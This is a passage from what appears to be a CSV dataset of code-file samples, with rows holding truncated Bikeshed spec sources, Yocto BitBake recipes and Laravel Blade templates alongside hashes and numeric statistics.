├─VariableDecl","15","0.8333333333333334","0.0","0.0" -"01f8e38ee9d8850900b9f225b9de9642238b5f84","markdown001.bs",".bs","Bikeshed","

Foo

- -
-Group: test
-Shortname: foo
-Level: 1
-Status: ED
-ED: http://example.com/foo
-Abstract: Test of markdown constructs
-Editor: Example Editor
-Date: 1970-01-01
-
- -Double-Underline Heading -======================== {#a} - -text - -Single-Underline Heading ------------------------- {#b} - -text - -# One-Hash Heading # {#c} - -text - -## Two-Hash Heading ## {#d} - -text - -### Three-Hash Heading ### {#e} - -text - -#### Four-Hash Heading #### {#f} - -text - -##### Five-Hash Heading ##### {#g} - -text - -###### Six-Hash Not-A-Heading ###### {#h} - -Tight Bulleted List -=================== - -* one -* two -* three - -Loose Bulleted List -=================== - -* one - -* two - -* three - -List With Paragraphs -==================== - -* one - one - one - - another paragraph - one - one - -* two - -Nested Lists -============ - -* one - - * nested one - * nested two -* - * nested one - * nested two -* * nested one - * nested two - -Numbered List -============= - -1. one -2. two -1. three - -Mixed Lists -=========== - -1. numbered one - - * bullet","52","1.1304347826086956","0.0","0.0" -"06c0412e1d8413ffa574b9d33032467b6a638735","Misc.bs",".bs","Bikeshed","package Misc(sysMisc) where -import RegFile -import FIFO -import ActionSeq - -type Int32 = UInt 32 - -sysMisc :: Module Empty -sysMisc = - module - m :: Thingy - m <- mkThingy - x :: Reg Int32 - x <- mkRegU - done :: Reg Bool - done <- mkReg False - s :: ActionSeq - s <- actionSeq ( m.fill |> m.square |> m.sum |> action { x := m.total; done := True } ) - unused :: Reg Bool - unused <- mkRegU - rules - when not done - ==> action { s.start } - -interface Thingy = - fill :: Action - square :: Action - sum :: Action - total :: Int32 - -type Size = 5 -type Indx = UInt Size - -data State = Idle | Fill | Square | Sum - deriving (Bits, Eq) - --- XXX -ext :: Indx -> Int32 -ext x = unpack (0 ++ pack x) - -mkThingy :: Module Thingy -mkThingy = - module - a1 :: RegFile Indx Int32 - a1 <- mkRegFileFull - a2 :: RegFile Indx Int32 - a2 <- mkRegFileFull - f1 :: FIFO Int32 - f1 <- mkFIFO - f2 :: FIFO Int32 - f2 <- mkFIFO - state :: Reg State - state <- mkReg Idle - i :: Reg Indx - i <- mkRegU - j :: Reg Indx - j <- mkReg","52","1.1304347826086956","0.0","0.0" -"1208c1491458505aade982f6b997ac5b6695e78c","Overview.bs",".bs","Bikeshed","
-Title: CSS Scroll Anchoring Module Level 1
-Shortname: css-scroll-anchoring
-Level: 1
-Group: csswg
-Status: ED
-Work Status: Revising
-ED: https://drafts.csswg.org/css-scroll-anchoring
-Editor: Steve Kobes, Google
-Editor: Tab Atkins-Bittner, Google, http://xanthir.com/contact/, w3cid 42199
-Abstract: Changes in DOM elements above the visible region of a scrolling box can result in the page moving
-Abstract: while the user is in the middle of consuming the content.
-Abstract:
-Abstract: This spec proposes a mechanism to mitigate this jarring user experience
-Abstract: by keeping track of the position of an anchor node and adjusting the scroll offset accordingly.
-Abstract:
-Abstract: This spec also proposes an API for web developers to opt-out of this behavior.
-
- -
-spec:css-box; type:dfn; text:content area
-spec:css22;
-	type:property;
-		text:max-height
-		text:min-height
-		text:height
-		text:max-width
-		text:min-width
-		text:width
-	type:dfn; te","52","1.1304347826086956","0.0","0.0"
-"01f78ae66e6af8e34c153c922774d4f50399a0ed","Overview.bs",".bs","Bikeshed","
-Title: CSS Box Model Module Level 3
-Shortname: css-box
-Level: 3
-Status: ED
-Work Status: Refining
-Group: csswg
-ED: https://drafts.csswg.org/css-box-3/
-TR: https://www.w3.org/TR/css-box-3/
-Previous Version: https://www.w3.org/TR/2020/WD-css-box-3-20201028/
-Abstract: This specification describes the margin and padding properties, which create spacing in and around a CSS box.
-Editor: Elika J. Etemad / fantasai, Invited Expert, http://fantasai.inkedblade.net/contact, w3cid 35400
-Ignored Terms: internal table elements, block layout
-At risk: applicability of 'margin', 'padding' and their longhands to [=ruby base containers=] and [=ruby annotation containers=]
-Issue Tracking: CSSWG GitHub https://github.com/w3c/csswg-drafts/issues
-

-
-spec:css-sizing-3; type:dfn; text:size
-

-
-Introduction {#intro}
-============
-
-	
This subsection is not normative.
-
-	
CSS describes how each element
-	and each string of text in a source docume","52","1.1304347826086956","0.0","0.0"
-"11729ed02b6e6851d703dccb4efbd58006e8b214","Overview.bs",".bs","Bikeshed","
CSS Containment Module Level 1

-
-
-Level: 1
-Shortname: css-contain
-Status: ED
-Work Status: Revising
-Group: csswg
-ED: https://drafts.csswg.org/css-contain/
-TR: https://www.w3.org/TR/css-contain-1/
-Previous Version: https://www.w3.org/TR/2017/WD-css-contain-1-20170419/
-Previous Version: https://www.w3.org/TR/2017/WD-css-contain-1-20170221/
-Editor: Tab Atkins, Google, http://xanthir.com/contact/
-Editor: Florian Rivoal, On behalf of Bloomberg, https://florian.rivoal.net/, w3cid 43241
-Abstract: This CSS module describes the 'contain' property, which indicates that the element's subtree is independent of the rest of the page. This enables heavy optimizations by user agents when used well.
-Ignored Terms: scrollWidth, scrollHeight, clientWidth, clientHeight, formatting context
-Link Defaults: css-lists-3 (property) counter-increment, css-content-3 (property) string-set
-

-
-

-Introduction

-
-	Efficiently rendering a website relies on the User Agent","52","1.1304347826086956","0.0","0.0"
-"0c1840c9a09e41b97e852eb40aeab362aa5b0121","xfce4-datetime-setter_3.32.2.bb",".bb","BitBake","DESCRIPTION = ""A fork of (early) gnome-control-center datetime panel for XFCE. \
-It is based upon GTK3 and embedds into recent xfce4-settings.""
-HOMEPAGE = ""https://github.com/schnitzeltony/xfce4-datetime-setter""
-LICENSE = ""GPLv2""
-LIC_FILES_CHKSUM = ""file://COPYING;md5=75859989545e37968a99b631ef42722e""
-
-DEPENDS = ""glib-2.0-native libxfce4ui""
-
-SRC_URI = ""git://github.com/schnitzeltony/xfce4-datetime-setter.git;protocol=https \
-           file://fix-inner-dependency.patch \
-""
-SRCREV = ""5c7a73a3824b03b91719e05e2604b97c7a72d50f""
-
-S = ""${WORKDIR}/git""
-
-inherit gettext meson features_check
-
-REQUIRED_DISTRO_FEATURES = ""systemd x11""
-
-FILES_${PN} += ""${datadir}/icons/hicolor""
-
-RDEPENDS_${PN} = ""tzdata""
-","791","1.0761904761904761","0.0","0.0"
-"01806dc12a91361dda3175d8875746bf0505c63a","ghc-contravariant_0.2.0.2.bb",".bb","BitBake","BBCLASSEXTEND = ""native""
-
-SRC_URI[md5sum] = ""3b73dd486bc7c62752924d9217762f74""
-SRC_URI[sha256sum] = ""77b8e9fcc65df51714eb95615b23371aa3bd864e8c6dedb775eb939058d08204""
-
-inherit ghc ghc-lib-common
-
-DEPENDS += ""ghc-transformers""
-DESCRIPTION = ""Haskell 98 contravariant functors""
-LICENSE = ""BSD-3-Clause""
-LIC_FILES_CHKSUM=""file://LICENSE;md5=daf6c5b2c1afd111ff98da4be98babc6""
-GHC_PN = ""contravariant""
-","791","1.0761904761904761","0.0","0.0"
-"032418b88a59a0d3a0121d003631fc43890daf1b","vyos-cfg-qos_git.bb",".bb","BitBake","SUMMARY = ""VyOS Configuration templates and scripts for QoS""
-HOMEPAGE = ""https://github.com/vyos/vyatta-cfg-qos""
-SECTION = ""vyos/qos""
-
-
-LICENSE = ""GPLv2""
-LIC_FILES_CHKSUM = ""file://COPYING;md5=eb723b61539feef013de476e68b5c50a""
-
-SRC_URI = ""git://github.com/vyos/vyatta-cfg-qos.git;branch=current;protocol=https \
-	  ""
-
-# snapshot from Aug 11, 2017:
-SRCREV = ""52f85ec00b8e85723920ebaab49ed8b318d9d475""
-
-PV = ""1.0+git${SRCPV}""
-
-S = ""${WORKDIR}/git""
-
-DEPENDS = ""vyos-bash""
-RDEPENDS_${PN} = ""sed perl procps vyos-cfg vyos-bash iproute2 bridge-utils ethtool""
-
-FILES_${PN} += ""/opt""
-
-
-# NOTE: this software seems not capable of being built in a separate build directory
-# from the source, therefore using 'autotools-brokensep' instead of 'autotools'
-inherit autotools-brokensep
-
-# additional options to be passed to the configure script:
-EXTRA_OECONF = ""\
-    --prefix=/opt/vyatta \
-    --exec_prefix=/opt/vyatta \
-	--sbindir=/opt/vyatta/sbin \
-	--bindir=/opt/vyatta/bin \
-	--datadir=/opt/vyatta/share \
-	--","791","1.0761904761904761","0.0","0.0"
-"11a0f93f7795dcf28367ba7a5d723d59bfb819cc","mmc-utils_git.bb",".bb","BitBake","SUMMARY = ""Userspace tools for MMC/SD devices""
-HOMEPAGE = ""http://git.kernel.org/cgit/linux/kernel/git/cjb/mmc-utils.git/""
-LICENSE = ""GPLv2""
-LIC_FILES_CHKSUM = ""file://mmc.c;beginline=1;endline=20;md5=fae32792e20f4d27ade1c5a762d16b7d""
-
-SRCBRANCH ?= ""master""
-SRCREV = ""2cb6695e8dec00d887bdd5309d1b57d836fcd214""
-
-PV = ""0.1""
-
-SRC_URI = ""git://git.kernel.org/pub/scm/linux/kernel/git/cjb/mmc-utils.git;branch=${SRCBRANCH}""
-
-S = ""${WORKDIR}/git""
-
-CFLAGS_append_powerpc64 = "" -D__SANE_USERSPACE_TYPES__""
-CFLAGS_append_mipsarchn64 = "" -D__SANE_USERSPACE_TYPES__""
-CFLAGS_append_mipsarchn32 = "" -D__SANE_USERSPACE_TYPES__""
-
-do_install() {
-    install -d ${D}${bindir}
-    install -m 0755 mmc ${D}${bindir}
-}
-","791","1.0761904761904761","0.0","0.0"
-"03d901dd8c84548a23c9b0c33efb65def14f7d64","nenscript_1.13.3.bb",".bb","BitBake","# Recipe created by recipetool
-# recipetool create -o nenscript_1.13.3.bb http://www.ai.mit.edu/projects/im/magnus/nenscript/nenscript-1.13.3.tar.bz2
-
-LICENSE = ""PD""
-LIC_FILES_CHKSUM = ""file://${COMMON_LICENSE_DIR}/PD;md5=b3597d12946881e13cb3b548d1173851""
-
-SRC_URI = ""http://www.ai.mit.edu/projects/im/magnus/nenscript/nenscript-${PV}.tar.bz2""
-SRC_URI[md5sum] = ""606f0966b893150ce70baed025a192f0""
-SRC_URI[sha256sum] = ""4e8811598891f956cbd54de0fb99744f71f9d68fe143d025ec91983df557e46e""
-
-# NOTE: this is a Makefile-only piece of software.
-
-do_configure () {
-    sed -i -e ""s%^INSTALLDIR	=.*%INSTALLDIR	= ${D}/usr%"" makefile
-    sed -i -e 's%^CFLAGS	=%CFLAGS	+=%' makefile
-    sed -i -e 's%^LFLAGS	=%# LFLAGS	=%' makefile
-    sed -i -e 's%/usr/ucb/install%install%' makefile
-    sed -i -e 's%555%755%' makefile
-    sed -i -e 's%444%644%' makefile
-    #cross-compile, stripping fails...
-    sed -i -e 's% \-s % %' makefile
-}
-
-do_compile () {
-    oe_runmake
-}
-
-do_install () {
-    install -d ${D}/usr/bin
-","791","1.0761904761904761","0.0","0.0"
-"0741fc292f45aa9b3b125d7016842e8f9df95579","index.blade.php",".php","Blade","@extends('admin.layouts.app')
-@section('main')
-    

-        

-            

-                

-                    

-                        
Posts

-                    

-                    

-                        
-                    

-                

-                

-                    @if ($errors->any())
-                        

-                            @foreach ($errors->all() as $error)
-                                {{ $error }}
-                            @endforeach
-                        

- ","23519","0.9944188406409877","0.0","0.0"
-"11a5e316f2ff084ae5cb4882175b4cf0b4d6ef41","index.blade.php",".php","Blade","
-@extends('layouts.template')
-
-@section('content')
-
-    @if(Session::has('message'))
-        

-            {{Session::get('type')}}
-
-                {{Session::get('message')}}
-
-            
-        

-        @endif
-        

-            

-                

-                    

-                        
Dashboard

-                    

-                

-            

-            

-                

-                    

-                        
    
-		
    ユーザー新規追加
    
-		{!! Form::model(new App\User, ['route' => 'user.store', 'files' => true]) !!}
-		@include('user._form')
-		{!! Form::submit('Add user', ['class' => 'btn btn-primary form-control']) !!}
-		{!! Form::close() !!}
-	

-@stop
-","23519","0.9944188406409877","0.0","0.0"
-"06f4f56e97d92f2cbca296b11e4dd0e8bfa43d53","index.blade.php",".php","Blade","@extends('auth.base')
-
-@section('contents')
-    

-        

-            

-                

-                    

-                        
标签一览

-                    

-                    

-                        

-                            
-                            
-